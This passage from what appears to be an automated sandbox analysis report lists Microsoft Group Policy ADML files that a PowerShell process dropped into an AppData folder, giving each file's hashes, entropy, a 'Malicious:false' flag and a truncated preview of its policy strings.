                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AM_AM">Attachment Manager</string>.. <string id="AM_CallIOfficeAntiVirus">Notify antivirus programs when opening attachments</string>.. <string id="AM_EstimateFileHandlerRisk">Trust logic for file attachments</string>.. <string id="AM_ExplainCallIOfficeAntiVirus">This policy setting allows you to manage the behavior for notifying registered antivirus programs. If multiple programs are registered, they will all be notified. If the registered antivirus program already performs on-access checks or scans

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\AuditSettings.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1846
                                                                                                                                                                                                        Entropy (8bit):4.78689414618934
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gmsYLytG4rpdfUMo5mvS3bHpWdPV:LeD5pmvWvp+5wwWNV
                                                                                                                                                                                                        MD5:71075FCE08402095AEAFBE57962A1F5B
                                                                                                                                                                                                        SHA1:F76FAE255AA5454217FE973C4A8035EC9005B923
                                                                                                                                                                                                        SHA-256:6928FAAD9624BBF4C74F6C138496A4C6AE8D04919C3DE9591568300C1DD39E59
                                                                                                                                                                                                        SHA-512:9DF7480E584B16D1B504E2503B3C4C8422EFC2FA37D9A4ACEB8A7AEA0561C0D73E8E73CB21FEA20C6EC3BBBCB715C155EFDA7B8E38B7B448BCDA5DB10D773DE4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Audit Process Creation</displayName>.. <description>Configuration settings for auditing process creation.</description>.. <resources>.. <stringTable>.. <string id="AuditSettings">Audit Process Creation</string>.. <string id="IncludeCmdLine">Include command line in process creation events</string>.. <string id="IncludeCmdLine_explain">This policy setting determines what information is logged in security audit events when a new process has been created.....This setting only applies when the Audit Process Creation policy is enabled. If you enable this policy setting the command line information for every process will be logged in plain tex

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\AutoPlay.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4884
                                                                                                                                                                                                        Entropy (8bit):4.732776627339853
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmCRsKp7RqiPKhB3a1jejcM64iVDJaqV:ELRRp74a1AbodJ7
                                                                                                                                                                                                        MD5:935C602DAD3F4335BD16C269E66DBFAA
                                                                                                                                                                                                        SHA1:3DF4DC6D55AF20F0593D807FB4FDEFB23CC3355A
                                                                                                                                                                                                        SHA-256:8773998440C8D534FA69833174D05D09088F07E6E5C0E41D7C04A229C7903879
                                                                                                                                                                                                        SHA-512:05ABFFC0CE836F7438BC711A9D2B5CEB8F3F1C48BE2AC9C1A91D286AED6FC4C8D740AE802DCD2CC65D066972DC8DAA84AD8A10FA775D66CB5F3DE34688D975EC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoPlay">AutoPlay Policies</string>.. <string id="AutoPlay_Help">Configure various AutoPlay behaviors.</string>.. <string id="NoAutorun">Set the default behavior for AutoRun</string>.. <string id="NoAutorun_Help">This policy setting sets the default behavior for Autorun commands..... Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines..... Prior to Windows Vista, when media containing an autorun command is inserte

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Biometrics.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (381), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4309
                                                                                                                                                                                                        Entropy (8bit):4.706598922443907
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:oD5pmJFp5A8M9DIn0C3ppMdiD+BukevPCRTqCV:+Mp5lM9M3ppUiC2vPClP
                                                                                                                                                                                                        MD5:C32F834C78DC4DB3C12084AB5115E4A5
                                                                                                                                                                                                        SHA1:BE211306E8BA801EDD43E68E28F98947354A35BC
                                                                                                                                                                                                        SHA-256:4222D7C39B72F570C01F76EE084278BD32619D039F197A1AAE0B508C4E2CAF32
                                                                                                                                                                                                        SHA-512:2551575C490A8B4C36FD0E44B4E7C27693DF94C74715BC0F242BE2F947AE2AF097D574AC1823F3ACC71E8D69C17D6257192AAB1255B25C3122F4196C10B9F674
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Biometrics Configuration Settings</displayName>.. <description>Biometrics Configuration Settings</description>.. <resources>.. <stringTable>.. <string id="BiometricsConfiguration">Biometrics</string>.. <string id="Biometrics_EnableBio">Allow the use of biometrics</string>.. <string id="Biometrics_EnableBio_Help">This policy setting allows or prevents the Windows Biometric Service to run on this computer... ..If you enable or do not configure this policy setting, the Windows Biometric Service is available, and users can run applications that use biometrics on Windows. If you want to enable the ability to log on with biometrics, yo

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Bits.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (534), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):32159
                                                                                                                                                                                                        Entropy (8bit):4.887654356231583
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Uw9+2pWqx80t3lMsQAZ5nV7smu7CQ62TDw4p2L:H+2Lx8Q3lLB+wx
                                                                                                                                                                                                        MD5:F6E746CD330A73B928C14770D9645BD0
                                                                                                                                                                                                        SHA1:7EDED72EB36035A93AF3943B6F5F330082307968
                                                                                                                                                                                                        SHA-256:80D730B14BBB66B29360C108C8A57E09AA33E57DC1C9EAFFCAD5D66B3EF98C31
                                                                                                                                                                                                        SHA-512:6295E9062941DAEDCF4BF3E5BEBA03010AFDE880F43E95052DBCE3FDB485C92C73B0CB57E9374F691C79FA43044CFCBBDB92CDE189E1C3AFF90024B19B525F1E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Supported Platforms -->.. <string id="SUPPORTED_WindowsXPSP2WindowsNETSP1orBITS20">Windows XP SP2 or Windows Server 2003 SP1, or computers with BITS 2.0 installed.</string>.. <string id="SUPPORTED_WindowsXPWindowsNETorBITS15">Windows XP or Windows Server 2003, or computers with BITS 1.5 installed.</string>.. <string id="SUPPORTED_Windows7OrBITS35">Windows 7 or computers with BITS 3.5 installed.</string>.. <string id="SUPPORTED_Windows8OrBITS5">Windows 8 or Windows Server 2012 or Windows RT or computers

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\CEIPEnable.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1949
                                                                                                                                                                                                        Entropy (8bit):4.91759301234844
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yMPs9IsKiz+d9Wz+fWz+MJe4UNr2ce4u5qHLuB1XR0r:cgeD5x8gm8fKfiI9W+WwUzqG1XGPV
                                                                                                                                                                                                        MD5:CB1E5DCF00DD4AA26834F7F02EA4AA0E
                                                                                                                                                                                                        SHA1:EAEBB6A75FE6AEEC3AFE914DF9DAD9BCB08702C1
                                                                                                                                                                                                        SHA-256:7651F59A99180721F39B02391BB51D382B39DBCD15E3E2245B10778B7A8A5D95
                                                                                                                                                                                                        SHA-512:BC84BD30E99735495803360F061088334736CAF9D7AE1C5FAD9C484D949991F09C59D6FB818DE35F6328E94FEDD63C2C6D80D63ACDF616BF936762CBF656AE3A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WindowsCEIPCat">Windows Customer Experience Improvement Program</string>.. <string id="CorporateSQM">Allow Corporate redirection of Customer Experience Improvement uploads</string>.. <string id="CorporateSQMExp">If you enable this setting all Customer Experience Improvement Program uploads are redirected to Microsoft Operations Manager server.....If you disable this setting uploads are not redirected to a Microsoft Operations Manager server.....If you do not configure this setting uploads are not redirect

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\COM.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1670
                                                                                                                                                                                                        Entropy (8bit):4.895822032017801
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yr7g9f8rbcFCv/9g4+4R4ldQ8o9+YPb+aDDWFV:cgeD5x8gm8fKN2fcFC2u47QxQ3aDDWFV
                                                                                                                                                                                                        MD5:33757EAC0441251ACE18BD74FF8E2BD0
                                                                                                                                                                                                        SHA1:B9DBC0B240CF803AFACB5D8D9AD26E39B757B04B
                                                                                                                                                                                                        SHA-256:44FA3B1E818EF70305AD41012D78CF140851EC0949D4F2457F60C295E31C8EDC
                                                                                                                                                                                                        SHA-512:5FB7BD40C37EAB269C7E9CF72EFB29D6A6A2EF76DB29DADD628866143A15FCEE46C865BE54C66D7C6ADE13766FF1A3028912BDF8BE05F1A6CD69D254431180C2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppMgmt_COM_SearchForCLSID">Download missing COM components</string>.. <string id="AppMgmt_COM_SearchForCLSID_Help">This policy setting directs the system to search Active Directory for missing Component Object Model (COM) components that a program requires.....Many Windows programs, such as the MMC snap-ins, use the interfaces provided by the COM components. These programs cannot perform all their functions unless Windows has internally registered the required components.....If you enable this policy setting

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\CipherSuiteOrder.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (1488), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6011
                                                                                                                                                                                                        Entropy (8bit):5.030765177000099
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmTKr0l1CSYNTV5vDiUFO3q6fWbKldN6joV:EqMRbaW+HN6c
                                                                                                                                                                                                        MD5:F7E00A4ABE6853A853D65FB722604674
                                                                                                                                                                                                        SHA1:9CFD9B20C60FB7024F91A7902D84182081427D7F
                                                                                                                                                                                                        SHA-256:4E01B6A54C1B3933D33645729AF7F69E50D687C37DB985A924917E6F8ACAB15B
                                                                                                                                                                                                        SHA-512:2ADAC9CDA13B12F0C2B2F7E9C9B943B50BE9A217FB32B486F783A5D842A820F2F2928E5336DE6E4FCA4B5CD9FC4F2D7FAA09F6C8285550CA7B3BD19E0CE4CA8B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SSLConfiguration">SSL Configuration Settings</string>.. <string id="SSLCipherSuiteOrder">SSL Cipher Suite Order</string>.. <string id="SSLCipherSuiteOrder_Help">This policy setting determines the cipher suites used by the Secure Socket Layer (SSL)..... If you enable this policy setting, SSL cipher suites are prioritized in the order specified..... If you disable or do not configure this policy setting, the factory default cipher suite order is used..... SSL2, SSL3, TLS 1.0 and T

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Conf.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10980
                                                                                                                                                                                                        Entropy (8bit):4.778547657476326
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmrrC2ZHEU5p5a4LH/+3SenetLKZHtpeL3DKTGbpKPKryy6JI5oyvr5UV:ESrC2RlFagcSenetKZHtOzrKPKrB5xj+
                                                                                                                                                                                                        MD5:797657FCFBC025F92F896B0095D1F6E4
                                                                                                                                                                                                        SHA1:F357F8B9A9671F711EAE5BEB7759A2EF73B953E9
                                                                                                                                                                                                        SHA-256:032F6BB5FBA082CA24EA70F6CBDC25E913FD43B68A44582AB30AEB29509FC2ED
                                                                                                                                                                                                        SHA-512:9C90FEE9737A7F66CD50B43C30A2BA05DC861A76618612DC744F7075D3296DDE577589060D3CC5779E44CA14ADD42502420DCDF9A68825817795FC89418847DD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowPersistAutoAcceptCalls">Allow persisting automatic acceptance of Calls</string>.. <string id="AllowPersistAutoAcceptCalls_Help">Make the automatic acceptance of incoming calls persistent.</string>.. <string id="AppSharing">Application Sharing</string>.. <string id="AudioVideo">Audio &amp; Video</string>.. <string id="DisableAdvCallingButton">Disable the Advanced Calling button</string>.. <string id="DisableAdvCallingButton_Help">Disables the Advanced Calling button on the General Optio

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ControlPanel.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (545), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6210
                                                                                                                                                                                                        Entropy (8bit):4.659729688008146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm0xrbTb9qSrboXpqjKq+F6TzGQ5wtt1cvWebgbPWLSrbTpKb9LbpqjKm+xN:EXx19axpuN52t16W7WW7p4Xxt49tY
                                                                                                                                                                                                        MD5:02F20EFB8F224DE1BECE4FA4FADF1442
                                                                                                                                                                                                        SHA1:16091D04A7A93CC21A3935841D1F30C643C2A782
                                                                                                                                                                                                        SHA-256:2D07C5B7079ED696AA73A4806A1B1FEB2863B6A579033EF1F0A10E3D5D5E5FBC
                                                                                                                                                                                                        SHA-512:D7239C57FA747F36C770D68BBDF31354A9C53D7A7AA3530CE7367FE612CE04B903142CDBBFCBAC11098D47E00D58B0C6620EF18CE324AD9933CBEB0FB5B6D15D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisallowCpls">Hide specified Control Panel items</string>.. <string id="DisallowCpls_Help">This setting allows you to display or hide specified Control Panel items, such as Mouse, System, or Personalization, from the Control Panel window and the Start screen. The setting affects the Start screen and Control Panel window, as well as other ways to access Control Panel items, such as shortcuts in Help and Support or command lines that use control.exe. This policy has no effect on items displayed in PC settings...

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ControlPanelDisplay.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (334), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):21011
                                                                                                                                                                                                        Entropy (8bit):4.7324938774717955
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:VfRyKGkSDgF+vXDtchtrWzsbHX92eLb2vB1E4RRN9:VfRXTCrvXDWrWziN2ZvB1fRX
                                                                                                                                                                                                        MD5:61CB7046C23A14515C58521DAD36AB6F
                                                                                                                                                                                                        SHA1:62EC7A88975656944FD8CA72924A916336112465
                                                                                                                                                                                                        SHA-256:A4F9A17502E8ABA9E82C5C324CBED40E109A565CA2E27B3D79389F1A595B3CCD
                                                                                                                                                                                                        SHA-512:13473DEADE6477440D9515C9FC6BABECDB59FE9A806633B003B14E71EC6E762DD9E13A9BFD1DFED554D7CA6A664B3C1EF0CEB7C8278F22CC0E0EEB793E697C1F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Display">Display</string>.. <string id="CPL_Display_Disable">Disable the Display Control Panel</string>.. <string id="CPL_Display_Disable_Help">Disables the Display Control Panel.....If you enable this setting, the Display Control Panel does not run. When users try to start Display, a message appears explaining that a setting prevents the action.....Also, see the "Prohibit access to the Control Panel" (User Configuration\Administrative Templates\Control Panel) and "Remove programs on Settings menu" (User Configuration\Administrative Templates\Star

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Cpls.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1585
                                                                                                                                                                                                        Entropy (8bit):4.924174965870825
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEBWNvHjWy8XGkjR7S2kjeRqZ+RguJb+RguJM6dGQEn:cgeD5x8gm8fKlBWN7WyeOuJ3uJv3EFV
                                                                                                                                                                                                        MD5:3A236D3ED9A6EAE336DE47BD71132D58
                                                                                                                                                                                                        SHA1:621C59891B91951F2E863EEFEA2D8310FB5125E3
                                                                                                                                                                                                        SHA-256:EF075F5436A4117C29F2D6689A8ED6ACC3BA22EAFBDEEA20C2349DBA5CFE1F33
                                                                                                                                                                                                        SHA-512:862AABB60EFFAC016188CF56BB6EC48F7E4F6847B4A1A4A525C1FD93DAA0269E0CB02DC8362F5B3029F817D1096B8C5BB48FA1717FE4084E2A99CDE13A3CE573
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Users">User Accounts</string>.. <string id="Users_Help">Contains settings to control the behavior of User Accounts</string>.. <string id="UseDefaultTile">Apply the default account picture to all users</string>.. <string id="UseDefaultTile_Help">This policy setting allows an administrator to standardize the account pictures for all users on a system to the default account picture. One application for this policy setting is to standardize the account pictures to a company logo.....Note: The default acc

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\CredSsp.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20162
                                                                                                                                                                                                        Entropy (8bit):4.80118154121946
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EYLfqDwf4tdJ11wpL9uiansm9cjoOkfmW/MQfB:9qtVPaxu5mUTOYJ
                                                                                                                                                                                                        MD5:3F887766536AE5C7677E841C9A1E86F6
                                                                                                                                                                                                        SHA1:C3BFB966D06DF84A5BD9FCDD9C0CAF23A4F85B28
                                                                                                                                                                                                        SHA-256:91A36F497D459EF96B4CEDB88EE0884651D8B5C0EABCE1C1F4FEC6D49FF71A31
                                                                                                                                                                                                        SHA-512:7777FF19B4B1108A2688D02F25AC69E3F66D87F44A42AD60596B447188728B231E148E67390B39B7CBCF62E83121ECB55A84CB3D72A55827C0489FADABA5469C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowDefaultCredentials">Allow delegating default credentials</string>.. <string id="AllowDefaultCredentials_Explain">This policy setting applies to applications using the Cred SSP component (for example: Remote Desktop Connection).....This policy setting applies when server authentication was achieved by using a trusted X509 certificate or Kerberos.....If you enable this policy setting, you can specify the servers to which the user's default credentials can be delegated (default credentials are those that you

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\CredUI.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3126
                                                                                                                                                                                                        Entropy (8bit):4.730467503379261
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmUes8vc8gDcwFalisWNFIXwN30M5vYFV:Etes8vc8gowUAvIXwN30M5vYn
                                                                                                                                                                                                        MD5:1C00F0E54B646BACA8571FC0B7BE9582
                                                                                                                                                                                                        SHA1:0494D0849B95970D96E480C9B00C3694E4D50029
                                                                                                                                                                                                        SHA-256:625371BBA40530A9A4A88E167B4870634F7583BB601D16954ED8FF4A0E5242E9
                                                                                                                                                                                                        SHA-512:99A2B51A6ADDF470B15DFDC2D3D32CA305113C427CDF7C3B85FD3BD43F17B989B5BEA38BA78821DA5A8978437DD3E484CCB283D9B01B737C05C4B7D82288D749
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CredUI">Credential User Interface</string>.. <string id="CredUI_Help">Contains settings to control the behavior of credential collection.</string>.. <string id="EnumerateAdministrators">Enumerate administrator accounts on elevation</string>.. <string id="EnumerateAdministrators_Help">This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. By default, administrator accounts are not displayed when the user attempts to elevate a ru

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\CredentialProviders.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (479), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5460
                                                                                                                                                                                                        Entropy (8bit):4.757258895669925
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmAznn5XkKkcx1ftU6beY3rqFimzWSsdK/l+3yY8V:Ejznn5XkJcx1fdPrqFOXU/loyb
                                                                                                                                                                                                        MD5:B735FF00BD6511F0525C74881042CFBF
                                                                                                                                                                                                        SHA1:F9540A99E5654EA5F6B7AAF49CE35F591CEC2863
                                                                                                                                                                                                        SHA-256:FF1B853B846EA63064AD460B42C44230DE008297B6A2DDB8DAA48991A5684C14
                                                                                                                                                                                                        SHA-512:A585AE89C4B13A6A2DE50D414069FE40D3DB53395A4E79B5865B530ACC6963B2C89647D2735B27229503B58BAC47B4C43B38E6E2BEB00B81EC6F1D76DB441C06
                                                                                                                                                                                                        Malicious:false
